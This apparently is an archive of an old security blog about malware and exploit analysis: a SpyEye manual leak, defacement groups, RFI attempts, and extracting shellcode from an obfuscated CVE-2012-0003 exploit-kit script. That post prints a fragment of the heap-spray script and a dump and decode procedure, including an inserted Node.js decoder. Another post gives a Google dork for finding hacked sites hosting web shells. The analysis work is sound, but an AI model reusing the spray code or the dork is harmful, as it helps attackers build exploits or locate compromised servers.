RDP exploit related ……. MS12-020
Posted in Uncategorized on March 16, 2012 by ianstarkc
SPYEYE Manual ….F-Secure … and …."VISCOLUL" at 10:31 !!
Posted in Uncategorized on March 13, 2012 by ianstarkc
Recently F-Secure posted about the SpyEye manual. It seems that back in 2011, someone helped another guy configure SpyEye and linked to this manual. IRC logs are here.
Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…
Posted in Uncategorized on January 31, 2012 by ianstarkc
Insert the following code at the "INSERT" location in the original malicious script. Remove the MIDI exploitation code before execution, so the script only dumps the shellcode string instead of triggering the exploit.
var fpo = new ActiveXObject("Scripting.FileSystemObject");
var sc = fpo.OpenTextFile("c:\\Shellcode.bin", true);
sc.WriteLine(escape(kpemoez4)); // kpemoez4 holds the shellcode string; escape() stores it as %uXXXX text
sc.Close();
————————————————————————————
———————————————————————————–
try{alert(a,b,c);}
catch(e)
{
var HrMm7="d";
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7="d";
delete FJWVzIe1;
"INSERT"
for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}
}
——————————————————————————————-
——————————————————————————————
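Because the snippet above writes escape(kpemoez4) to disk, c:\Shellcode.bin holds %uXXXX text rather than raw bytes. As an added example (not from the original post or the Dadong script), the Node.js code below reverses escape() and lays the resulting 16-bit code units out as UTF-16LE, which is how the JScript engine stores the sprayed string in memory and therefore the byte order a disassembler needs; the sample dump string is constructed, not taken from the real script.

```javascript
"use strict";

// Reverse JScript's escape(): "%uXXXX" is one 16-bit code unit, "%XX" is a
// code unit below 0x100, and any other character stands for itself.
// Malformed escapes are kept literally, matching unescape() behaviour.
function unescapeToCodeUnits(escaped) {
  const units = [];
  let i = 0;
  while (i < escaped.length) {
    if (escaped.startsWith("%u", i) && /^[0-9a-fA-F]{4}$/.test(escaped.slice(i + 2, i + 6))) {
      units.push(parseInt(escaped.slice(i + 2, i + 6), 16));
      i += 6;
    } else if (escaped[i] === "%" && /^[0-9a-fA-F]{2}$/.test(escaped.slice(i + 1, i + 3))) {
      units.push(parseInt(escaped.slice(i + 1, i + 3), 16));
      i += 3;
    } else {
      units.push(escaped.charCodeAt(i));
      i += 1;
    }
  }
  return units;
}

// Each code unit occupies two bytes, low byte first, in the engine's string
// storage; that is the byte sequence the heap-sprayed block actually contains.
function codeUnitsToBytes(units) {
  const bytes = [];
  for (const u of units) bytes.push(u & 0xff, (u >> 8) & 0xff);
  return bytes;
}

function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
}

// Constructed sample standing in for the file contents: a short NOP sled
// followed by arbitrary words. WriteLine appends CRLF, hence the trim().
const SAMPLE_DUMP = "%u9090%u9090%uE8FC%u0000\r\n";

function decodeDump(text) {
  const bytes = codeUnitsToBytes(unescapeToCodeUnits(text.trim()));
  return { length: bytes.length, hex: toHex(bytes) };
}

console.log(decodeDump(SAMPLE_DUMP));
```

Feed the resulting bytes to a disassembler to read the payload; the decoded output for the sample is 8 bytes starting with the 90 90 sled.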
LOD 0x05
Posted in LOD on February 15, 2010 by ianstarkc
This website will give you all information about hacked/defaced sites. Recently it exposed the e2 Lab scam (earlier associated with Ankit Fadia .. LOL and Double LOL).
LOD 0x04
Posted in LOD on February 14, 2010 by ianstarkc
If you analyze the web logs of the National Software Reference Library, supported by the National Institute of Standards and Technology (NIST), US, especially under "Technical Information -> Missing Files", you'll see lots of RFI (Remote File Inclusion) exploit attempts. All these files contain the strings explained by the SANS Storm Center. You know how websites get hacked? Here is a sample hacked site. You can find more hacked sites using this Google dork: "intitle:FaTaLisTiCz_Fx Fx29SheLL". Also, you can analyse these web logs and, most importantly, your own web logs!! So what do you think about FeeLCoMz?
LOD 0x03
Posted in LOD on February 6, 2010 by ianstarkc
Websites defaced by R3YR3 !!
Both websites are owned by the same person (who has taken a WHOIS privacy service).
R3YR3 is a member of an Indonesian defacers group. It seems another member of the same group, Flyff666, is responsible for the Win32.Sality.aa virus as detected by Kaspersky, and he himself has given it different names like W32.Sarap.B or W32.Amburadul.Virus, or has taken code from them. Infected files are here and I think this webserver itself is infected. (The files have double extensions; this virus infects image file formats like JPG, GIF, PNG etc.)